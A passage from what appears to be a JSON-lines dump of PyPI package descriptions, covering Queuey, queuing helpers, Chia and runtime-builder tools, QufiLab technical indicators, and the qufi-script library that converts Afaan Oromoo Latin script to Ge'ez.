This will prevent accidental loss of configuration\nduring an update.bin/pserve etc/queuey.iniTroubleshooting:\u201cUpgrading\u201d Queuey may require reinitializing the schema. To reinitialize the\nschema, remove all data files. The new correct schema will be automatically\ncreated during the next Queuey startup.Stop Cassandra:kill -2 `cat cassandra.pid`Remove the Cassandra data directory (not the Cassandra binary directory):rm -rf ./cassandraStart Cassandra:./bin/cassandra/bin/cassandra -p cassandra.pidChangelog0.8 (2012-08-28)FeaturesCompatibility with Cassandra 1.1Add new API\u2019s to get, post and update messages by their message idAdd new memory storage backend for testing purposes.Add metlog based metrics logging.Use pycassa\u2019s system manager support to programmatically create the\nCassandra schema during startup.Bug fixesFix precision errors in server side message id to timestamp conversion.Enforce message keys to be valid UUID1 instead of just any UUID."} +{"package": "queuey-py", "pacakge-description": "queuey-py: Python client library for QueueyThis is a Python client library used for interacting with messages from aMozilla Services message queue(http://queuey.readthedocs.org/).DocumentationYou can read the documentation athttp://queuey-py.readthedocs.org/Changelog0.2 (2012-08-28)Test against a Queuey 0.8 release.Documentation tweaks and updates.0.1 (2012-07-10)Changesinceargument of themessagesmethod to deal with message ids\nrather than imprecise timestamps.Code extracted from qdo."} +{"package": "queuing", "pacakge-description": "queuingMultithreating producent-consumer solutionExampleimportqueuingimporttimeimportlogginglogging.basicConfig(level=logging.DEBUG,format='%(asctime)s[%(levelname)5s]%(name)s%(message)s')@queuing.consumer(instances=5)defm1(no):time.sleep(1)print(\"m1{}\".format(no))queuing.broker.send('m2',{'no':no,'sqno':no*no,})[queuing.broker.send('m3',{'no':no,})foriinrange(0,10)]@queuing.consumer(instances=2)defm2(no,sqno):time.sleep(2)print(\"m2{}{}\".format(no,sqno))@queuing.consumer(instances=1)defm3(no):print(\"m3{}\".format(no))if__name__=='__main__':foriinrange(0,10):queuing.broker.send('m1',{'no':i})queuing.broker.loop()"} +{"package": "queuing-hub", "pacakge-description": "queuing-hubMulti-cloud Queuing Hub for PythonDescriptionThis is a wrapper tool for AWS SQS and Google Cloud PubSub(Topic and pull subscription) with transparent interface.Easy messaging redundancy.Improve fault tolerance by avoiding queues becoming SPOFsDuplicate production messages to test environment for debuggingInstallRequirementspython = \"^3.6\"google-cloud-pubsub = \"^2.4.0\"google-cloud-monitoring = \"^2.0.1\"boto3 = \"^1.17.18\"UsagePublisherfromqueuing_hub.publisherimportPublisherpub=Publisher()# Send a message to all queues accessible by defaultresponse=pub.push(topic_list=pub.topic_list,body='Hello world!')Subscriberfromqueuing_hub.subscriberimportSubscribersub=Subscriber()# Receive messages with list ascending priority from queues accessible by defaultresponse=sub.pull(sub_list=sub.sub_list,max_num=1,ack=True)Forwarderfromqueuing_hub.forwarderimportForwarderfwd=Forwarder(sub=sub.sub_list[0],topic=pub.topic_list[0],max_num=1)# copy messageresponse_0=fwd.pass_through()# move messageresponse_1=fwd.transport()"} +{"package": "queuinx", "pacakge-description": "QueuinxQueuinx is an implementation of some queuing theory results in JAX that is differentiable and accelerator friendly.\nThe particular focus is on networks of finite queues solved by fixed point algorithm of a 
RouteNetStep step.\nThe API is designed to follow Jraph.QT meets MLThe use of JAX, a machine learning framework, as the basis for the implementation allows the use of\nadvanced computational tools like differentiable programming, compilation and accelerator support.Installationpip install git+https://github.com/krzysztofrusek/queuinx.gitor from pypipip install queuinxIf you decide to apply the concepts presented or build on the provided code, please refer to our paper.@ARTICLE{9109574,\n author={K. {Rusek} and J. {Su\u00e1rez-Varela} and P. {Almasan} and P. {Barlet-Ros} and A. {Cabellos-Aparicio}},\n journal={IEEE Journal on Selected Areas in Communications}, \n title={RouteNet: Leveraging Graph Neural Networks for Network Modeling and Optimization in SDN}, \n year={2020},\n volume={38},\n number={10},\n pages={2260-2270},\n doi={10.1109/JSAC.2020.3000405}\n}Documentation"} +{"package": "quevedo", "pacakge-description": "QuevedoQuevedo is a python tool for creating, annotating and managing datasets of\ngraphical languages, with a focus on the training and evaluation of machine\nlearning algorithms for their recognition.Quevedo is part of theVisSE project. The code can\nbe found atGitHub, anddetailed\ndocumentation here.FeaturesDataset management, including hierarchical dataset organization, subset\npartitioning, and semantically guided data augmentation.Structural annotation of source images using a web interface, with support for\ndifferent users and the live visualization of data processing scripts.Deep learning network management, training, configuration and evaluation,\nusingdarknet.InstallationQuevedo requirespython >= 3.7, and can be installed fromPyPI:$pipinstallquevedoOr, if you want any extras, like the web interface:$pipinstallquevedo[web]Or directly from the wheel in therelease\nfile:$pipinstallquevedo-{version}-py3-none-any.whl[web]You can test that quevedo is working. To use the neural network module, you will also need to install\ndarknet.UsageTo create a dataset:$quevedo-Dpath/to/new/datasetcreateThen you cancdinto the dataset directory so that the-Doption is not\nneeded.You can also download an example dataset from this repository\n(examples/toy_arithmetic), or peruse ourCorpus of Spanish\nSignwriting.To see information about a dataset:$quevedoinfoTo launch the web interface (you must have installed the \"web\" extra):$quevedowebFor more information, and the list of commands, runquevedo --helporquevedo <command> --helpor seehere.DevelopmentTo develop on quevedo, we usepoetryas our environment, dependency and build\nmanagement tool. In the quevedo code directory, run:$poetryinstallThen you can run quevedo with$poetryrunquevedoDependenciesQuevedo makes use of the following open source projects:python 3poetrydarknetclickflaskpreactjsAdditionally, we use thetomlandforcelayoutlibraries, and build our\ndocumentation withmkdocs.AboutQuevedo is licensed under theOpen Software License version\n3.0.The web interface includes a copy ofpreactjsfor ease of offline use, distributed\nunder theMIT License.Quevedo is part of the project\"Visualizando la SignoEscritura\" (Proyecto VisSE,\nFacultad de Inform\u00e1tica, Universidad Complutense de\nMadrid)as part of the\nprogram for funding of research projects on Accessible Technologies financed by\nINDRA and Fundaci\u00f3n Universia. An expert system developed using Quevedo is\ndescribedin this article.VisSE teamAntonio F. G.
Sevillaafgs@ucm.esAlberto D\u00edaz EstebanJose Mar\u00eda Lahoz-Bengoechea"} +{"package": "quex-chia-base", "pacakge-description": "chia_base: base data types for chia coins, spends and contract developmentensconsThis package usesensconswhich usesSConsto build rather than the commonly usedsetuptools."} +{"package": "quex-chialisp-builder", "pacakge-description": "Chialisp BuilderUse this wheel in conjunction withruntime_builderto manage building of chialisp at build time or during development.UseAddchialisp_builderas a buildtime dependency and a development-time dependency. Don't add it as a runtime dependency, as the clvm.hexfiles should be built and included with the wheel. The source does not need to be.Addchialisp_loaderas a runtime dependency to get theload_programfunction, which will call the building function if present (as it should be at development time.)FAQWhy isn't this included as part ofruntime_builder?Theruntime_builderwheel is intended to provide a general solution for non-python artifacts. Although Chialisp build was the inspiration forruntime_builder, it's just one potential use. This wheel is the specific implementation of chialisp builds for use withruntime_builder."} +{"package": "quex-chialisp-loader", "pacakge-description": "chialisp_loaderThis tiny wheel exportsload_program, which is used to loadchialispprograms from resources included with python wheels.Chialisp.clspfiles are compiled into.hexoutput. Only.hexoutput files need to be included in binary wheelsWhenload_programis called, it tries to importchialisp_builder. If it fails, it assumes this is running at deploy time: any.clspfiles are ignored, and the corresponding program is loaded from the.hexfile."} +{"package": "quex-chialisp-puzzles", "pacakge-description": "chialisp_puzzlesThis project contains several standard and legacy puzzles commonly used on the chia network.Note that it usesensconsto build, as the more commonly usedsetuptoolsdoes not easily allow fine-grained control of the contents of thesdistandwheelfiles.In particular, this example takes pains to include the source filesruntime_buildor*.clspin the sdist but not the wheel.UseTo load a puzzle, do something likefromchialisp_puzzlesimportload_puzzleprogram=load_puzzle(\"p2_delegated_puzzle_or_hidden_puzzle\")LicenseThis project is licensed under the Apache 2 License. See the LICENSE file for more details."} +{"package": "quex-hsms", "pacakge-description": "HSMS: hardware security module software/simulatorThis project is intended to run on an air-gapped computer to sign chia spends using bls12_381 keys.Install$ pip install -e .If on windows, you need one extra package:$ pip install pyreadlineToolsCommand-line tools installed include:hsms- HSM sim that acceptsUnsignedSpendobjects and produces signatures, full or partialhsmgen- generate secret keyshsmpk- show public keys for secret keyshsmmerge- merge signatures for a multisig spendqrint- convert binary to/from qrint asciiFor testing & debugging:hsm_test_spend- create a simple testUnsignedSpendmultisig spendhsm_dump_sb- debug utility to dump information about aSpendBundlehsm_dump_us- debug utility to dump information about anUnsignedSpend"} +{"package": "quex-runtime-builder", "pacakge-description": "Runtime BuilderSometimes python developers want to include compiled output or other binary blob artifacts in their wheels. 
The source materials for this output is checked into git, but the blobs are not, since they're not source material and are at risk getting out of sync with the source distribution.When building the wheel, the blobs need to be generated. But it may also be nice to rebuild the blobs if the source have changed at runtime to automate a step of the edit/test cycle.This project lets you declare a single configuration describing how to build the artifacts, and build them at runtime during the development cycle or at wheel build time.ExampleThere are example projects intests/project_template_ensconsandtests/project_template_setuptools.tests/project_template_setuptools\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 proj\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 bar.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 foo.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 run_test.py\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 runtime_build\n\u251c\u2500\u2500 pyproject.toml.template\n\u251c\u2500\u2500 setup.py\n\u251c\u2500\u2500 test_pip_install.sh\n\u2514\u2500\u2500 test_pip_install_editable.shThis examples usessetuptoolsandsetup.pyto build. Thesetup.pyandruntime_buildfiles work together to make available artifacts built from the.sourcefiles.project_template_enscons\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 SConstruct\n\u251c\u2500\u2500 proj\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 bar.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 foo.source\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 run_test.py\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 runtime_build\n\u251c\u2500\u2500 pyproject.toml.template\n\u251c\u2500\u2500 test_pip_install.sh\n\u2514\u2500\u2500 test_pip_install_editable.shNote that this example usesensconsto build, assetuptoolsdoes not easily allow fine-grained control of the contents of thesdistandwheelfiles. In particular, this example takes pains to include the source filesruntime_build,foo.sourceandbar.sourcein the sdist but not the wheel.ConfigurationArtifacts to be build must be declared in aruntime_buildfile located in the destination module of the artifacts. Each submodule can have zero or one of these build files. In theproject_templateexample above,bar.sourceandfoo.sourceeach produce an output in theprojsubmodule, andruntime_builddefines what the artifacts are.This configuration file can be loaded at build time or at run time, so itcannotimport anything that isn't made available in thebuild-system.requiressection ofpyproject.toml. In particular, it cannot import anything from the project being built since it has to be built before it can be installed in the build package, leading to a bootstrap problem.Here is the example from above:frompathlibimportPathfromtypingimportCallableclassMultiplyBuild:def__init__(self,factor:int)->None:self.factor=factordef__call__(self,target_path:Path):source_path=target_path.with_suffix(\".source\")t=int(open(source_path).read())withopen(target_path,\"w\")asf:f.write(f\"{t*self.factor}\")defcount_build(target_path:Path)->None:source_path=target_path.with_suffix(\".source\")t=open(source_path).read()withopen(target_path,\"w\")asf:f.write(f\"{len(t)}\\n\")BUILD_ARGUMENTS:dict[str,Callable[[Path],None]]={\"foo.val\":MultiplyBuild(50),\"bar.count\":count_build,}The key is to return adictobject calledBUILD_ARGUMENTSthat hasstrkeys corresponding to artifacts, andCallablevalues. TheCallableshould generate the given artifact.These examples could potentially build the artifacts every time they are referenced. 
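A build callable is also free to skip work it does not need to do. As one illustrative variation on the count_build example above (an assumption of this sketch, not something shipped with runtime_builder), the builder can compare modification times and return early while the target is still fresh:

from pathlib import Path

def count_build_if_stale(target_path: Path) -> None:
    # Same artifact as count_build, but skip the work when the target already
    # exists and is at least as new as its .source input.
    source_path = target_path.with_suffix('.source')
    if (target_path.exists()
            and target_path.stat().st_mtime >= source_path.stat().st_mtime):
        return
    text = source_path.read_text()
    target_path.write_text(f'{len(text)}\n')

# It would then be registered in BUILD_ARGUMENTS exactly like count_build.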
If a build takes long enough, you may want to add code to only build when necessary to speed the edit/test cycle.Build-timeTheruntime_builderwheel is primarily a build-time dependency. If you want to take advantage of the run-time building, you need to install it in your runtime virtual environment. However, it generally should not be installed in the release version of your package.Add it to yourpyproject.tomlfile:[build-system]requires=[\"runtime_builder\",...]In theSConstructfile is the following line:built_items = build_all_items_for_package(\"proj\")This returns the list of artifacts as a list ofPathobjects. These files must be included in the final wheel.RuntimeTo use the dynamic build capabilities at runtime, use something like this boilerplate function:try:fromruntime_builderimportbuild_on_demandexceptImportError:# `runtime_builder` is an optional dependency for development onlydefbuild_on_demand(*args):passdefload_resource(resource_path:str,package:Package,)->bytes:build_on_demand(package,resource_path)withas_file(files(package).joinpath(resource_path))astarget_path:returntarget_path.read_bytes()This checks for presence ofruntime_builder, and invokes it if available before accessing the resource."} +{"package": "qufia", "pacakge-description": "Qufia Python SDKThe Python SDK for the qufia api"} +{"package": "qufilab", "pacakge-description": "QufiLabQufilab is a fast and modern technical indicators library\nimplemented in c++.FeaturesWide array of technical indicators.InstallationNotyetimplementedDocumentation for QufiLab can be found at:https://qufilab.readthedocs.ioUsageWARNING: All of qufilab's technical indicators are implemented in c++\nand a big part of the speed performance comes from the fact that no\ntype conversion exist between python and c++. In order for this to work, numpy arrays\nof typenumpy.dtype.float64 (double) or numpy.dtype.float32 (float)are preferably used. 
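For example, an input series can be converted up front with plain numpy (nothing qufilab-specific is assumed here):

import numpy as np

prices = np.asarray([134.2, 135.1, 133.8, 136.0], dtype=np.float64)  # or np.float32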
Observe that all other types of numpy arrays still are accepted, however the retured numpy array will be converted into the typenumpy.dtype.float64.Indicatorsimportqufilabasqlimportnumpyasnp# Creates an ndarray with element type float64.data=np.random.rand(1000000)# Calculate sma with a period of 200.sma=ql.sma(data,period=200)# Calculate bollinger bands with a period of 20 and two standard deviations from the mean.upper_band,middle_band,lower_band=ql.bbands(data,period=20,deviation=2)"} +{"package": "qufi-script", "pacakge-description": "\u12a5\u1295\u12b3\u1295 \u1260\u12f0\u1205\u1293 \u1218\u1321\u1218\u130d\u1262\u12eb\u12a5\u1295\u130d\u12f4 \u1203\u1308\u122b\u127d\u1295 \u12a2\u1275\u12ee\u1335\u12eb \u12e8\u122b\u1237 \u12e8\u1206\u1291 \u1261\u12d9 \u1290\u1308\u122e\u127d \u12a0\u120f\u1275\u1365 \u12a8\u1290\u12da\u1205\u121d \u12a0\u1295\u12f1\u1293 \u12cb\u1290\u129b\u12cd \u134a\u12f0\u120e\u127f \u1293\u1278\u12cd\u1362 \u1206\u1296\u121d \u130d\u1295 \u12a5\u1290\u12da\u1205 \u134a\u12f0\u120e\u127d \u1260\u1270\u12c8\u1230\u1291 \u124b\u1295\u124b\u12ce\u127d \u120b\u12ed \u1325\u1245\u121d \u120b\u12ed \u1232\u12cd\u120d\u1365 \u12a0\u1295\u12f3\u1295\u12f5 \u124b\u124b\u12ce\u127d \u12f0\u1308\u121e \u1260\u1263\u12d5\u12f3\u1295 \u1203\u1308\u122b\u1275 \u134a\u12f0\u120d \u12ed\u1320\u1240\u121b\u1209\u1364 \u12a8\u1290\u12da\u1205\u121d \u12a0\u1295\u12f1 \u12a6\u122e\u121d\u129b (\u12a0\u134b\u1295 \u12a6\u122e\u121e) \u1290\u12cd\u1362 \u12e8\u12a6\u122e\u121d\u129b \u124b\u1295\u124b \u1260\u130d\u12d5\u12dd \u134a\u12f0\u120b\u1275 \u12a5\u1295\u12f3\u12ed\u1320\u1240\u121d \u12a8\u121a\u12eb\u12f0\u1228\u1309\u1275 \u12cb\u1293 \u1290\u1308\u122e\u127d \u12a0\u1295\u12f1\u1366 \u1260\u12a0\u134b\u1295 \u12a6\u122e\u121e \u124b\u1295\u124b \u12cd\u1235\u1325 10 \u12f5\u121d\u133e\u127d \u1232\u1296\u1229\u1365 \u12e8\u130d\u12d5\u12dd \u134a\u12f0\u120d \u130d\u1295 \u12eb\u1208\u12cd 7 \u12f5\u121d\u133e\u127d \u1265\u127b \u1293\u1278\u12cd\u1362\u1235\u1208\u12da\u1205 \u12ed\u1205\u1295 \u127d\u130d\u122d \u1260\u1218\u1228\u12f3\u1275 \u1263\u1209\u1275 \u134a\u12f0\u120b\u1275 \u120b\u12ed \u12a8\u120b\u12ed \u12a0\u1295\u12f5 \u1290\u1325\u1265 \u1260\u121b\u12f5\u1228\u130d \u12a5\u1290\u129a\u1205 \u12e8\u1240\u1229\u1275 \u134a\u12f0\u120d(\u12f5\u121d\u133e\u127d) \u1270\u1328\u121d\u1228\u12cd\u1260\u1275\u1365 \u1260\u1240\u120b\u1209 \u12e8\u12a0\u134b\u1295 \u12a6\u122e\u121e\u1295 \u124b\u1295\u124b \u1260\u1203\u1308\u122b\u127d \u134a\u12f0\u120d \u1218\u133b\u134d \u12a5\u1295\u12f5\u1295\u127d\u120d \u12ed\u1205 \u00ab\u120b\u12ed\u1265\u1228\u122a\u00bb \u1270\u12d8\u130b\u1305\u1277\u120d\u1362 \u1240\u1325\u120e \u12eb\u1209\u1275\u1295 \u1218\u1218\u122a\u12eb\u12ce\u127d \u12ed\u1218\u120d\u12a8\u1271\u1362\u12a0\u132b\u132b\u1295\u12ed\u1205\u1295 \u00ab\u120b\u12ed\u1265\u1228\u122a\u00bb \u12ae\u121d\u1352\u12cd\u1270\u122e \u120b\u12ed \u1208\u1218\u132b\u1295\u1366$ pip install qufi-script\u12a0\u1201\u1295 \u12a0\u1295\u121e\u12ad\u122dpython\n\nfrom qufi import QubeFidel \n\nqube = QubeFidel()\nprint(qube.convert(\"Ashamaa!\"))\u12cd\u1324\u1275\u12a0\u1238\u121b!\u12a8\u12da\u1205 \u1260\u1273\u127d \u1219\u1209 \u121b\u1265\u122a\u122a\u12eb\u12cd \u1260\u12a0\u134b\u1295 \u12a6\u122e\u121e \u1240\u122d\u1267\u120dSagaleewwan Dheeraa fi GabaabaaEgaa akkumma beekamu Afaan Oromoo keessatti dheerachuunii fi gabaabbachuun fi jabinnii fi laafinni sagalee hiika jechaa irratti garaagarummaa guddaa ni fida. 
Haaluma kanaan afaan oromoon qubee gi'iziitin haala gaariin akka hin barreeffamne danqaawwan ta'aa turan keessaa inni guddaan: qubee gi'iz keessati sagaleewwan 7 yommuu jiraatan, afaan oromoo keessatti immoo sagaleewwan 10tu jiru. Egaa nutis kana hubachuun, qubeewwan amma argaman irrati tuqaa tokko mataa isaaniirra kaa'un sagaleewwan hanqatan kun itti dabalamaniiruu. Kana irratti hundaa'uunis sagaleewwan kunniin bakka 3^^tti^^ qoodamu: sagalee dheeraa, sagalee gabaabaa fi al-sagalee jedhamu.Sagaleewwan GabaabaaQubee jahaaffaan(\u1233\u12f5\u1235) fi arfaffaa(\u122b\u12d5\u1265) alatti warri jiran Sagaleewwan gabaaba jedhamun beekamu. Baay'inni isaanis shan(5)ni dha.Fakkeenya sagaleewwan gabaabaa maati qubee\u1218QubeeSagalee\u1218ma\u1219mu\u121ami\u121cme\u121emoSagaleewwan dheeraaSagaleewwan kunnin immoo, qubeewwan sagalee gabaabaa duraan jiran irrati tuq-tokko mataa ofirratti maxxanfachuunii kan uumamaniifii qubee arfaffaa(\u122b\u12d5\u1265) dha. Baa'inni isaanis shan(5)ni dha.Fakkeenya sagaleewwan dheeraa maatii\u1218QubeeSagalee\u1219\u135emuu\u121a\u135emii\u121bmaa\u121c\u135emee\u121e\u135emooHubachiisa: Qubeen arfaffaa ofumasaa sagalee dheeraa waan ta'eef, yoomiyyu taanaan tuq-tokko mataa ofii isaarratti hin maxxanfatu.Al-SagaleeQubeewwan kunnin immoo sagalee of danda'aa mataa isaanii kan hin qabnee ta'anii, warra qubeewwan jahaaffaa(\u1233\u12f5\u1235) ta'anidha. Faayidaan isaanis: jechoota jabeessuu, cufa birsagaa irratti, jechota irra buutaa qaban keessattii fi akka maxxantootaatti tajaajiluudha.Jechoota Gabaabaafi DheeraaEgaa akkuma beekamu jechoonni hundinuu barsaga mataa mataa isaani ta'e ni qabu. Birsagoonni kunis sagalee of danda'oo ni ta'u; Kanaafuu sagaloota kana gara qubee gi'iz duraan dubbanetti jijjiiruuf salphaa nuuf ta'a.Fakkeenya 1: jechilagajedhu birsagoota lama qaba: la fi ga. birsagoonni kunis sagaleewwan of danda'oo waaan ta'aaniif gara sagaloota\u1208fi\u1308tti jijjiiramu. Kanaafuu jechilagajedhu\u1208\u1308ta'a jechuudha.Fakkeenya 2: jechilaagaajedhu birsagoota lama qaba: laa fi gaa. ammas birsagoonni kunis sagaleewwan of danda'oo waaan ta'aaniif gara sagaloota\u120bfi\u130btti jijjiiramu. Kanaafuu jechilaagaajedhu\u120b\u130bta'aFakkeenya jechoota gabaabaa fi dheeraa muraasaGabaabaaDheeraaHori[\u1206\u122a]Horii[\u1206\u122a\u135e]Mala[\u1218\u1208]Malaa[\u1218\u120b]Gara[\u1308\u1228]Garaa[\u1308\u122b], Gaara[\u130b\u1228]Lafa[\u1208\u1348]Laafaa[\u120b\u134b]Ana[\u12a0\u1290]Aanaa[\u12a3\u1293]Jechoota irra butaaJechoota irra butaa jijiiruf duraan dursinee jechicha gara birsagaatti addaan qoodna, achiis sagaleewwan of danda'oo fi alsagaleewwan jechichaa qubee gi'iiziin bakka buufna.Fakkeenyaaf jechaFardajedhu kana gara birsagaatti haa qoqqoodnu:Farfidata'a. Kunis\u1348\u122dfi\u12f0ta'a. Kanaafu jechiFardajedhu\u1348\u122d\u12f0ta'a jechuudha.Jechoota irra butaa tokko tokkoFarda\u1348\u122d\u12f0Ilma\u12a2\u120d\u1218Jilba\u1302\u120d\u1260Harka\u1200\u122d\u12a8Harma\u1200\u122d\u1218Arba\u12a0\u122d\u1260Sagalewwan JabaaJecha keenya duraan dursinee gara birsagaatti qoqqooduun, achiin birsaga arganne sana qubeewwan sagaleewwan ofdanda'oo qabanii fi al-sagaleewwaniin bakka buusuudha.Fakkeenyaaf jechaJimmaajedhu osoo fudhannee birsagoota lama qaba:Jim(\u1302\u121dfimaadha. Kanaafuu jechi kun yemmuu jijjiiramu\u1302\u121d\u121bta'a.Haalli dubbisaa jechoota jabaa: qubee jahaaffaa(\u1233\u12f5\u1235) liqimsuunii fi qubee isa itti aanu jabeessinee dubbifna. Fakkeenyaaf jechaTokkojedhu yemmuuu jijjiirru\u1276\u12ad\u12aeta'a. 
Haalli dubbisa isaa kunisTokkojedhamee dubbifama malee, sagalee addaan kutuun:Tok-kojedhamee hin dubbifamu!Birsagaaan alatti, jecha tokko keessatti maatiwwan qubee tokkoo qubeen jahaffaa(\u1233\u12f5\u1235) fi kan biraa walduraa duubaan walitti aananii yoo dhufan, qubeen jahaaffaatti(\u1233\u12f5\u1235) itti aanee argamu sun jabeeffamee dubbifama.Jechoota jabaa fi laafaa tokko tokkoLaafaaJabaaJimaa[\u1302\u121b]Jimmaa[\u1302\u121d\u1361\u121b]Waloo[\u12c8\u120e\u135e]Walloo[\u12c8\u120d\u1361\u120e\u135e]Hare[\u1200\u122c]Harre[\u1200\u122d\u1361\u122c]Badaa[\u1260\u12f3]Baddaa[\u1260\u12f5\u1361\u12f3]Qale[\u1240\u120c]Qalle[\u1240\u120d\u1361\u120c]Maxxantoota Muraasa-n-\u1295-tti-\u1275\u1272-f-\u134dol-\u12a6\u120d--oota\u12a6\u135e\u1270python \nfrom qufi import QubeFidel \n\nqube = QubeFidel()\n\nprint(qube.convert(\"Caalaan kaleessa mana barumsaa deeme.\"))\n\nprint(qube.convert(\"Baacaan sa'aa bite.\"))\n\nprint(qube.convert(\"Gaariin ijoollee fe'e.\"))\u12cd\u1324\u1275\u132b\u120b\u1295 \u12a8\u120c\u135e\u1235\u1230 \u1218\u1290 \u1260\u1229\u121d\u1233 \u12f4\u135e\u121c\u1362\n\n\u1263\u132b\u1295 \u1230\u12a3 \u1262\u1274\u1362\n\n\u130b\u122a\u135e\u1295 \u12a2\u1306\u135e\u120d\u120c\u135e \u134c\u12a4\u1362Jechoota hin jiiramneJechoota akka hin jijjiiramne gochuuf, jechicha `` keessa galchuun akka hin jijjiiramne gochuun ni danda'ama.python\nfrom qufi import QubeFidel\n\nqube = QubeFidel()\n\nprint(qube.convert(\"`Caalaan` deeme.\"))\n\nprimt(qube.convert(\"`Jechi kun hin jijiiramu!`\"))\u12c8\u1324\u1275Caalaan \u12f4\u135e\u121c\u1362\n\nJechi kun hin jijiiramu!Qubeewwan dachaaCha\u1298Dha\u12f8Nya\u1298Pha\u1330Sha\u1238Tsa\u1340Zya\u12d8\u12a8\u1273\u127d \u1260\u121d\u1235\u1209 \u120b\u12ed \u12eb\u1209\u1275 \u134a\u12f0\u120b\u1275\u1363 \u1275\u12ad\u12ad\u1208\u129b\u12cd \u12e8\u12a0\u134b\u1295 \u12a6\u122e\u121e \u12e8 Dha \u134a\u12f0\u120b\u1275 \u1293\u1278\u12cd\u1362Qubeewwan suuraa armaan oliitti argaman, maatii qubee \"Dha\" isa sirrii dha.Sirna Tuqaalee.\u1362:\u1365,\u1363;\u1364......??!!\u1241\u1264\u134a\u12f0\u120d\u1275\u122d\u1309\u121dQore\u1246\u122c\u1348\u1270\u1290Qoree\u1246\u122c\u135e\u12a5\u123e\u1205Qorre\u1246\u122d\u122c\u1240\u12d8\u1240\u12d8Qorree\u1246\u122d\u122c\u135e\u1348\u1275\u1290\u1295Qooree\u1246\u135e\u122c\u135e\u12f0\u122d\u1246Qoorree\u1246\u135e\u122d\u122c\u135e\u12f0\u1228\u1245\u1295Namootni hundinuu birmaduu ta'anii mirgaa fi ulfinaanis wal-qixxee ta'anii dhalatan. 
Sammuu fi qalbii ittiin yaadan waan uumamaan kennameef, hafuura obbolommaatiin wal-wajjin jiraachuu qabu.\u1290\u121e\u135e\u1275\u1292 \u1201\u1295\u12f2\u1291\u135e \u1262\u122d\u1218\u12f1\u135e \u1270\u12a0\u1292\u135e \u121a\u122d\u130b \u134a \u12a1\u120d\u134a\u1293\u1292\u1235 \u12c8\u120d-\u1242\u1325\u1324\u135e \u1270\u12a0\u1292\u135e \u12f8\u1208\u1270\u1295\u1362 \u1230\u121d\u1219\u135e \u134a \u1240\u120d\u1262\u135e \u12a2\u1275\u1272\u135e\u1295 \u12eb\u12f0\u1295 \u12cb\u1295 \u12a1\u135e\u1218\u121b\u1295 \u12ac\u1295\u1290\u121c\u135e\u134d\u1363 \u1200\u1349\u135e\u1228 \u12a6\u1265\u1266\u120e\u121d\u121b\u1272\u135e\u1295 \u12c8\u120d-\u12c8\u1305\u1302\u1295 \u1302\u122b\u1279\u135e \u1240\u1261\u1362\u12e8\u134a\u12f0\u120d \u1308\u1260\u1273AUUUIIIAAEEE\u00d8OOO\u1200\u1201\u1201\u135e\u1202\u1202\u135e\u1203\u1204\u1204\u135e\u1205\u1206\u1206\u135ehahuhuuhihiihaaheheehhohoo\u1208\u1209\u1209\u135e\u120a\u120a\u135e\u120b\u120c\u120c\u135e\u120d\u120e\u120e\u135elaluluuliliilaaleleelloloo\u1218\u1219\u1219\u135e\u121a\u121a\u121b\u121c\u121c\u135e\u121d\u121e\u121e\u135emamumuumimiimaamemeemmomoo\u1228\u1229\u1229\u135e\u122a\u122a\u135e\u122b\u122c\u122c\u135e\u122d\u122e\u122e\u135eraruruuririiraarereerroroo\u1230\u1231\u1231\u135e\u1232\u1232\u135e\u1233\u1234\u1234\u135e\u1235\u1236\u1236\u135esasusuusisiisaaseseessosoo\u1238\u1239\u1239\u135e\u123a\u123a\u135e\u123b\u123c\u123c\u135e\u123d\u123e\u123e\u135eshashushuushishiishaashesheeshshoshoo\u1240\u1241\u1241\u135e\u1242\u1242\u135e\u1243\u1244\u1244\u135e\u1245\u1246\u1246\u135eqaququuqiqiiqaaqeqeeqqoqoo\u1260\u1261\u1261\u135e\u1262\u1262\u135e\u1263\u1264\u1264\u135e\u1265\u1266\u1266\u135ebabubuubibiibaabeveebboboo\u1268\u1269\u1269\u135e\u126a\u126a\u135e\u126b\u126c\u126c\u135e\u126d\u126e\u126e\u135evavuvuuviviivaaveveevvovoo\u1270\u1271\u1271\u135e\u1272\u1272\u135e\u1273\u1274\u1274\u135e\u1275\u1276\u1276\u135etatutuutitiitaateteettotoo\u1278\u1279\u1279\u135e\u127a\u127a\u135e\u127b\u127c\u127c\u135e\u127d\u127e\u127e\u135echachuchuuchichiichaachecheechchochoo\u1290\u1291\u1291\u135e\u1292\u1292\u135e\u1293\u1294\u1294\u135e\u1295\u1296\u1296\u135enanunuuniniinaaneneennonoo\u1298\u1299\u1299\u135e\u129a\u129a\u135e\u129b\u129c\u129c\u135e\u129d\u129e\u129e\u135enyanyunyuunyinyiinyaanyenyeenynyonyoo\u12a0\u12a1\u12a1\u135e\u135e\u12a2\u12a2\u135e\u12a3\u12a4\u12a4\u135e\u12a5\u12a6\u12a6\u135e(')a(')u(')uu(')i(')ii(')aa(')e(')ee-(')o(')oo\u12a8\u12a9\u12a9\u135e\u12aa\u12aa\u135e\u12ab\u12ac\u12ac\u135e\u12ad\u12ae\u12ae\u135ekakukuukikiikaakekeekkokoo\u12c8\u12c9\u12c9\u135e\u12ca\u12ca\u135e\u12cb\u12cc\u12cc\u135e\u12cd\u12ce\u12ce\u135ewawuwuuwiwiiwaaweweewwowoo\u12d8\u12d9\u12d9\u135e\u12da\u12da\u135e\u12db\u12dc\u12dc\u135e\u12dd\u12de\u12de\u135ezazuzuuziziizaazezeezzozoo\u12e0\u12e1\u12e1\u135e\u12e2\u12e2\u135e\u12e3\u12e4\u12e4\u135e\u12e5\u12e6\u12e6\u135ezyazyuzyuuzyizyiizyaazyezyeezyzyozyoo\u12e8\u12e9\u12e9\u135e\u12ea\u12ea\u135e\u12eb\u12ec\u12ec\u135e\u12ed\u12ee\u12ee\u135eyayuyuuyiyiiyaayeyeeyyoyoo\u12f0\u12f1\u12f1\u135e\u12f2\u12f2\u135e\u12f3\u12f4\u12f4\u135e\u12f5\u12f6\u12f6\u135edaduduudidiidaadedeeddodoo\u12f8\uab09\uab09\u135e\uab0a\uab0a\u135e\uab0b\uab0c\uab0c\u135e\uab0d\uab0e\uab0e\u135edhadhudhuudhidhiidhaadh